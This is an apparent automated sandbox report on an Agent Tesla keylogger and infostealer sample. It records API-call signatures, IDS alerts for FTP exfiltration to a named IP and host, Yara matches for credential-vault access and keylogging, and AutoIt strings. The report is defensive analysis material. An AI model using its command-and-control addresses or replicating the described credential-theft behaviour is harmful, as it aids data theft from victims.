Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E8EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	6_2_00E8EF95
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E8F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	6_2_00E8F0F2
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E8F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	6_2_00E8F3F3
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E837EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	6_2_00E837EF
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E83B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	6_2_00E83B12
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E8BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	6_2_00E8BCBC

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.9:49893 -> 162.241.62.63:40112
Source: Network traffic	Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.9:49882 -> 162.241.62.63:21

Yara detected Generic Downloader

Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.phagocytose.exe.10a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.phagocytose.exe.40c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1584641137.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1426434556.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: global traffic

TCP traffic: 192.168.2.9:49893 -> 162.241.62.63:40112

Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 162.241.62.63 162.241.62.63

Source: Joe Sandbox View

ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US

Source: unknown

DNS query: name: ip-api.com

Source: unknown

FTP traffic detected: 162.241.62.63:21 -> 192.168.2.9:49882 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 150 allowed.220-Local time is now 15:19. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 150 allowed.220-Local time is now 15:19. Server port: 21.220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 150 allowed.220-Local time is now 15:19. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\28uMwHvbTD.exe

Code function: 0_2_007B22EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_007B22EE

Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: ftp.antoniomayol.com

Source: RegSvcs.exe, 00000003.00000002.1585828509.0000000002A8E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2603734744.000000000241E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://antoniomayol.com
Source: RegSvcs.exe, 00000003.00000002.1585828509.0000000002A8E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2603734744.000000000241E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ftp.antoniomayol.com
Source: RegSvcs.exe, 00000003.00000002.1585828509.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2603734744.00000000023CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: phagocytose.exe, 00000002.00000002.1426434556.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1583227782.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1585828509.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1583665309.0000000000CDE000.00000004.00000020.00020000.00000000.sdmp, phagocytose.exe, 00000006.00000002.1584641137.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2603734744.00000000023CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: RegSvcs.exe, 00000003.00000002.1585828509.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2603734744.00000000023CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: phagocytose.exe, 00000002.00000002.1426434556.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1583227782.0000000000402000.00000040.80000000.00040000.00000000.sdmp, phagocytose.exe, 00000006.00000002.1584641137.00000000040C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/

Source: C:\Users\user\Desktop\28uMwHvbTD.exe

Code function: 0_2_007B4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_007B4164

Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007B4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,	0_2_007B4164
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E94164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,	2_2_00E94164
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E94164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,	6_2_00E94164

Source: C:\Users\user\Desktop\28uMwHvbTD.exe

Code function: 0_2_007B3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_007B3F66

Source: C:\Users\user\Desktop\28uMwHvbTD.exe

Code function: 0_2_007A001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_007A001C

Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007CCABC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,	0_2_007CCABC
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00EACABC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,	2_2_00EACABC
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00EACABC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,	6_2_00EACABC

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 2.2.phagocytose.exe.10a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 2.2.phagocytose.exe.10a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 2.2.phagocytose.exe.10a0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 2.2.phagocytose.exe.10a0000.1.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 6.2.phagocytose.exe.40c0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 6.2.phagocytose.exe.40c0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 6.2.phagocytose.exe.40c0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 6.2.phagocytose.exe.40c0000.1.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 00000006.00000002.1584641137.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000006.00000002.1584641137.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 00000002.00000002.1426434556.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000002.00000002.1426434556.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00743B3A
Source: 28uMwHvbTD.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: 28uMwHvbTD.exe, 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_61b494a4-e
Source: 28uMwHvbTD.exe, 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_50a54ce6-3
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: This is a third-party compiled AutoIt script.	2_2_00E23B3A
Source: phagocytose.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: phagocytose.exe, 00000002.00000002.1425882526.0000000000ED4000.00000040.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_7d40a613-d
Source: phagocytose.exe, 00000002.00000002.1425882526.0000000000ED4000.00000040.00000001.01000000.00000004.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_405e976c-1
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: This is a third-party compiled AutoIt script.	6_2_00E23B3A
Source: phagocytose.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: phagocytose.exe, 00000006.00000002.1583164213.0000000000ED4000.00000040.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_a321b358-f
Source: phagocytose.exe, 00000006.00000002.1583164213.0000000000ED4000.00000040.00000001.01000000.00000004.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_e5d92cc2-5

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_00743633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,	0_2_00743633
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007CC1AC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,	0_2_007CC1AC
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007CC498 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,	0_2_007CC498
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007CC57D SendMessageW,NtdllDialogWndProc_W,	0_2_007CC57D
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007CC5FE DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,	0_2_007CC5FE
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007CC860 NtdllDialogWndProc_W,	0_2_007CC860
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007CC8BE NtdllDialogWndProc_W,	0_2_007CC8BE
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007CC88F NtdllDialogWndProc_W,	0_2_007CC88F
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007CC93E ClientToScreen,NtdllDialogWndProc_W,	0_2_007CC93E
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007CC909 NtdllDialogWndProc_W,	0_2_007CC909
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007CCA7C GetWindowLongW,NtdllDialogWndProc_W,	0_2_007CCA7C
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007CCABC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,	0_2_007CCABC
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_00741290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,	0_2_00741290
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_00741287 NtdllDialogWndProc_W,GetSysColor,SetBkColor,74BFC8D0,NtdllDialogWndProc_W,	0_2_00741287
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007CD3B8 NtdllDialogWndProc_W,	0_2_007CD3B8
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007CD43E GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,	0_2_007CD43E
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_0074167D NtdllDialogWndProc_W,	0_2_0074167D
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007416DE GetParent,NtdllDialogWndProc_W,	0_2_007416DE
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007416B5 NtdllDialogWndProc_W,	0_2_007416B5
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007CD78C NtdllDialogWndProc_W,	0_2_007CD78C
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_0074189B NtdllDialogWndProc_W,	0_2_0074189B
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007CBC5D NtdllDialogWndProc_W,CallWindowProcW,	0_2_007CBC5D
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007CBF30 NtdllDialogWndProc_W,	0_2_007CBF30
Source: C:\Users\user\Desktop\28uMwHvbTD.exe	Code function: 0_2_007CBF8C ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,	0_2_007CBF8C
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E23633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,	2_2_00E23633
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00EAC1AC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,	2_2_00EAC1AC
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00EAC498 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,	2_2_00EAC498
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00EAC5FE DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,	2_2_00EAC5FE
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00EAC57D SendMessageW,NtdllDialogWndProc_W,	2_2_00EAC57D
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00EAC8BE NtdllDialogWndProc_W,	2_2_00EAC8BE
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00EAC88F NtdllDialogWndProc_W,	2_2_00EAC88F
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00EAC860 NtdllDialogWndProc_W,	2_2_00EAC860
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00EAC93E ClientToScreen,NtdllDialogWndProc_W,	2_2_00EAC93E
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00EAC909 NtdllDialogWndProc_W,	2_2_00EAC909
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00EACABC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,	2_2_00EACABC
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00EACA7C GetWindowLongW,NtdllDialogWndProc_W,	2_2_00EACA7C
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E21287 NtdllDialogWndProc_W,GetSysColor,SetBkColor,74BFC8D0,NtdllDialogWndProc_W,	2_2_00E21287
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E21290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,	2_2_00E21290
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00EAD3B8 NtdllDialogWndProc_W,	2_2_00EAD3B8
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00EAD43E GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,	2_2_00EAD43E
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E216DE GetParent,NtdllDialogWndProc_W,	2_2_00E216DE
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E216B5 NtdllDialogWndProc_W,	2_2_00E216B5
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E2167D NtdllDialogWndProc_W,	2_2_00E2167D
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00EAD78C NtdllDialogWndProc_W,	2_2_00EAD78C
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00E2189B NtdllDialogWndProc_W,	2_2_00E2189B
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00EABC5D NtdllDialogWndProc_W,CallWindowProcW,	2_2_00EABC5D
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00EABF8C ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,	2_2_00EABF8C
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 2_2_00EABF30 NtdllDialogWndProc_W,	2_2_00EABF30
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E23633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,	6_2_00E23633
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00EAC1AC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,	6_2_00EAC1AC
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00EAC498 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,	6_2_00EAC498
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00EAC5FE DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,	6_2_00EAC5FE
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00EAC57D SendMessageW,NtdllDialogWndProc_W,	6_2_00EAC57D
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00EAC8BE NtdllDialogWndProc_W,	6_2_00EAC8BE
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00EAC88F NtdllDialogWndProc_W,	6_2_00EAC88F
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00EAC860 NtdllDialogWndProc_W,	6_2_00EAC860
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00EAC93E ClientToScreen,NtdllDialogWndProc_W,	6_2_00EAC93E
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00EAC909 NtdllDialogWndProc_W,	6_2_00EAC909
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00EACABC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,	6_2_00EACABC
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00EACA7C GetWindowLongW,NtdllDialogWndProc_W,	6_2_00EACA7C
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E21287 NtdllDialogWndProc_W,GetSysColor,SetBkColor,74BFC8D0,NtdllDialogWndProc_W,	6_2_00E21287
Source: C:\Users\user\AppData\Local\roundup\phagocytose.exe	Code function: 6_2_00E21290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,	6_2_00E21290
